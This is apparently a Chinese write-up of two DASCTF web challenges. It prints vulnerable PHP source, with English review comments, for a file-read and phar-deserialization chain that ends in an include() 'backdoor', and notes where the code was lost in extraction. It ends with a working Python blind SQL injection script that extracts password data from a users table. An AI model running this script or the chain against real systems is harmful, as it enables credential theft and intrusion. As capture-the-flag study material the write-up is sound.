书接上回,DASCTF 由于我那天蹲 24h 麦当劳睡了一个晚上,到了酒店继续睡了一个下午,导致看到这题的时候已经只剩下一小时了。最后比赛结束后一个多小时才解出来,不过博客还是要有的。
Ez to getflag
这题第一眼看,任意文件读,然后获取源码 Getshell。
其实呢,直接访问 /flag,就出了,可以说是非预期吧。
从原题思路的角度来说,我们先读取 file.php 和 upload.php,获取后端源码
// NOTE(review): extraction appears to have dropped the head of file.php
// (everything from `<?php` through the last `->`) — presumably the include
// of class.php and the construction of a Show object whose show() is called.
// Only that trailing method call survives below.
//file.php show(); ?>
// NOTE(review): same extraction loss as file.php: the head of upload.php
// (from `<?php` through the last `->`) is gone; only the trailing
// uploadfile() call on the upload-handler object survives below.
///upload.php uploadfile(); ?>
里面嵌套了一个 class.php,也读出来
//class.php
// NOTE(review): extraction dropped the head of this file (`<?php`, the first
// class's declaration and the start of its constructor up to `$this->`); that
// class's name is not recoverable here. What survives shows it is the upload
// handler driven by upload.php: the constructor tail stores $_FILES in $f.
f = $_FILES; }

    // Writes the uploaded file to ./upload/<md5(client filename)>.png.
    // The stored name is derived only from the client-supplied name, so a
    // second upload with the same name replaces the first (the unlink below
    // makes that explicit); unlink failures are hidden by `@`.
    function savefile() {
        $fname = md5($this->f["file"]["name"]).".png";
        if(file_exists('./upload/'.$fname)) {
            @unlink('./upload/'.$fname);
        }
        // Relative target path: resolves against the process's working
        // directory, not this script's directory.
        move_uploaded_file($this->f["file"]["tmp_name"],"upload/" . $fname);
        echo "upload success! :D";
    }

    // String conversion reads two properties ($fname, $fsize) that the visible
    // constructor tail never sets, then performs a dynamic property read on
    // whatever $fname holds. If $fname is an object, that read invokes the
    // object's __get() (see Show::__get below). A __toString that dereferences
    // state an attacker can shape via deserialization is a classic gadget;
    // it should not reach into other objects.
    function __toString(){
        $cont = $this->fname;
        $size = $this->fsize;
        echo $cont->$size;
        return 'this_is_upload';
    }

    // Entry point called from upload.php: validate, then store.
    function uploadfile() {
        if($this->file_check()) {
            $this->savefile();
        }
    }

    // Accepts the upload only if the last dot-separated part of the client
    // filename is "png" and the file body matches none of a fixed keyword
    // blocklist. Neither check verifies the content is actually a PNG (e.g.
    // getimagesize or re-encoding would); both are blocklist-style and should
    // be read as a hurdle, not a guarantee. Returns bool.
    function file_check() {
        $allowed_types = array("png");
        $temp = explode(".",$this->f["file"]["name"]);
        $extension = end($temp);
        if(empty($extension)) {
            echo "what are you uploaded? :0";
            return false;
        }
        else{
            if(in_array($extension,$allowed_types)) {
                // Case-insensitive word blocklist applied to the whole body.
                $filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
                $f = file_get_contents($this->f["file"]["tmp_name"]);
                if(preg_match_all($filter,$f)){
                    echo 'what are you doing!! :C';
                    return false;
                }
                return true;
            }
            else {
                echo 'png onlyyy! XP';
                return false;
            }
        }
    }
}

// Reads and displays a file named by the request (see file.php). The check in
// show() is a blocklist of URL schemes and ".."; any other value — including
// an absolute local path — goes straight to file_get_contents, which is the
// arbitrary file read the writeup uses. An allow-list of permitted files, or
// a fixed base directory plus a realpath() prefix check, would close it.
class Show{
    public $source;

    public function __construct($fname) {
        $this->source = $fname;
    }

    public function show() {
        if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',$this->source)) {
            die('illegal fname :P');
        }
        else {
            echo file_get_contents($this->source);
            $src = "data:jpg;base64,".base64_encode(file_get_contents($this->source));
            // NOTE(review): the HTML emitted here was lost in extraction —
            // presumably an <img> tag using $src. The literal below (a lone
            // newline) is what survives of it.
            echo "
";
        }
    }

    // Reading an undefined property forwards the property name to ok(), a
    // method this class does not define, so the call falls through to __call.
    function __get($name) {
        $this->ok($name);
    }

    // Any undefined method call: if the last argument loosely equals 'phpinfo'
    // the server dumps phpinfo(); otherwise the last argument is handed to
    // backdoor(). The method name is ignored apart from being returned.
    public function __call($name, $arguments) {
        if(end($arguments)=='phpinfo'){
            phpinfo();
        }else{
            $this->backdoor(end($arguments));
        }
        return $name;
    }

    // include() of a caller-supplied path: an arbitrary file inclusion sink
    // with no restriction on $door. Via __get/__call it is reachable from a
    // mere property read on a Show instance, which is what makes this class
    // unsafe to deserialize from untrusted input.
    public function backdoor($door){
        include($door);
        echo "hacked!!";
    }

    // Deserialization hook. NOTE: this blocklist differs from show(): `php:`
    // is missing here, so the two checks are not equivalent. A blocklist on
    // $source in __wakeup also does nothing for the __get/__call/backdoor path.
    public function __wakeup() {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            die("illegal fname XD");
        }
    }
}

// Echoes $str on destruction. Because echo of an object calls its
// __toString, a deserialized Test whose $str holds an object triggers that
// object's __toString at destruction — the entry point into the chain above.
class Test{
    public $str;

    public function __construct(){
        $this->str="It's works";
    }

    public function __destruct() {
        echo $this->str;
    }
}
?>
发现 ban 了 gopher 协议,那就直接用 phar 反序列化做就好
绝对防御
这题其实可以自己找网页的接口,不过在这么一个静态网页里面找出来还是有点难,至少我找了好久才找到。
最后被人安利了一个这样的插件
一下子就找到了,真的舒服,然后就是正常的联合盲注,注表名,注数据了。
发现自己以前写的盲注脚本好丑,抄一个好看的上来。
import string
import requests

# NOTE(review): the host in this URL is blank in the published page; treat it
# as a placeholder for the challenge endpoint.
url = 'http:///SUPPERAPI.php?id='
# Both alphabets below are defined but never used: the loop walks ASCII codes
# 32..127 directly.
char = string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}-_~!,"
digit = string.digits
flag = ""

# Boolean-based blind extraction, one character position per outer iteration.
# The `id` parameter is presumably concatenated into the SQL unescaped, so the
# appended `||<condition>` becomes part of the query; the response containing
# "admin" is the true/false oracle. Parameterized queries on the server side
# would make this construction inert.
# NOTE(review): indentation was lost in extraction; the nesting below (the
# final print and the break inside the if) is reconstructed from the logic.
for i in range(1,100):
    for j in range(32,128):
        print(j)
        payload = f"ascii(substr((select group_concat(password) from users), {i}, 1))='{j}'"
        data = f"0||{payload}"
        res = requests.get(url + data)
        if "admin" in res.text:
            flag += chr(j)
            print("flag:" + flag)
            break